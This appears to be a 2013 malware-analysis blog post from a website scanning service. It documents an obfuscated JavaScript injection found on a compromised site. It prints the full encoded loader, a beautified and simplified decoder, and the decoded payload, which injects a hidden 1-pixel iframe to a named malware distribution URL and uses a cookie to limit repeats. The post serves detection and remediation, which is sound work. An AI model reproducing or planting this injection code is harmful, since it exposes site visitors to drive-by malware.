Thursday, April 18, 2013

Malicious JavaScript generates hidden iframe to malware distributor

Obfuscated malicious JavaScript code generates hidden iframe to load content from remote malicious domain

Background

Online Website Malware Scanner has identified malicious JavaScript code injected into website pages. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website visitor and to redirect web browser to remote malware distributor. This infected website hosts suspicious JavaScript code injected in file. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed Apr 17 20:17:53 2013
Infected website's files: 1
Website malware scan report link: http://goo.gl/D5PF8


Website malware scanner report


Malicious JavaScript injection detected


Threat dump:
[[                                                                                                                                                                                                                                                          aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,66,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,66,6c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5c,61,5f,61,6c,59,64,65,5d,5c,61,59,6a,5d,6b,67,6d,6a,5b,5d,26,5b,67,65,27,64,67,5b,59,64,6b,5d,59,6a,5b,60,65,59,6a,63,5d,6c,61,66,5f,6c,70,26,5b,67,65,27,5d,6b,5c,26,68,60,68,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,66,6c,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,66,6c,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");}w=f;s=[];if(window.document)for(i=2-2;-i+1397!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+8);}xz=e;if(window.document)xz(s)}]]


Malware entry


Malware entry details.

Beautified script


  1. aq = "0x";
  2. ff = String;
  3. fff = "fromCh" + "a" + "rCode";
  4. ff = ff[fff];
  5. zz = 3;
  6. try {
  7.     document.body ^= ~1;
  8. } catch (z1z1) {
  9.     v = 123;
  10.     vzs = 0;
  11.     try {
  12.         document;
  13.     } catch (q) {
  14.         vzs = 1;
  15.     }
  16.     if (!vzs) e = eval;
  17.     if (1) {
  18.         f ="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,66,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,66,6c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5c,61,5f,61,6c,59,64,65,5d,5c,61,59,6a,5d,6b,67,6d,6a,5b,5d,26,5b,67,65,27,64,67,5b,59,64,6b,5d,59,6a,5b,60,65,59,6a,63,5d,6c,61,66,5f,6c,70,26,5b,67,65,27,5d,6b,5c,26,68,60,68,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,66,6c,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,66,6c,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");
  19.     }
  20.     w = f;
  21.     s = [];
  22.     if (window.document) for (= 2 - 2; - i + 1397 != 0; i += 1) {
  23.             j = i;
  24.             if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 8);
  25.     }
  26.     xz = e;
  27.     if (window.document) xz(s)
  28. }


Simplified version of malicious JavaScript code injection


  1. = "5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,...75,5,2,75" ["split"](",");
  2. s=""
  3. for (= 2 - 2; - i + 1397 != 0; i += 1){ s = s + String.fromCharCode(eval("0x" + (f[i])) + 8);}  
  4. eval(s);


Malicious payload


Decoded payload generates hidden iframe to http://digitalmediaresource[.]com/localsearchmarketingtx.com/esd.php



  1. function zzzfff() {
  2.     var nt = document.createElement('iframe');
  3.     nt.src = 'http://digitalmediaresource.com/localsearchmarketingtx.com/esd.php';
  4.     nt.style.position = 'absolute';
  5.     nt.style.border = '0';
  6.     nt.style.height = '1px';
  7.     nt.style.width = '1px';
  8.     nt.style.left = '1px';
  9.     nt.style.top = '1px';
  10.     if (!document.getElementById('nt')) {
  11.         document.write('<div id=\'nt\'></div>');
  12.         document.getElementById('nt').appendChild(nt);
  13.     }
  14. }
  15. function SetCookie(cookieName,cookieValue,nDays,path) {
  16.  var today = new Date();
  17.  var expire = new Date();
  18.  if (nDays==null || nDays==0) nDays=1;
  19.  expire.setTime(today.getTime() + 3600000*24*nDays);
  20.  document.cookie = cookieName+"="+escape(cookieValue)
  21.                  + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie( name ) {
  24.         var start = document.cookie.indexOf( name + "=" );
  25.         var len = start + name.length + 1;
  26.         if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) )
  27.         {
  28.                 return null;
  29.         }
  30.        
  31.         if ( start == -1 ) return null;
  32.         var end = document.cookie.indexOf( ";", len );
  33.         if ( end == -1 ) end = document.cookie.length;
  34.                 return unescape( document.cookie.substring( len, end ) );
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.         if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
  39.         zzzfff();
  40. }
  41. }



Blacklisting status


The website is Suspicious on Google Safe Browsing.


Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

1 comment:

  1. Another website infected with the same injection detected by online scanner.

    Link to malware report: http://quttera.com/detailed_report/www.carloratto.com

    Submitted by online users on: Thu Apr 18 12:04:55 2013

    ReplyDelete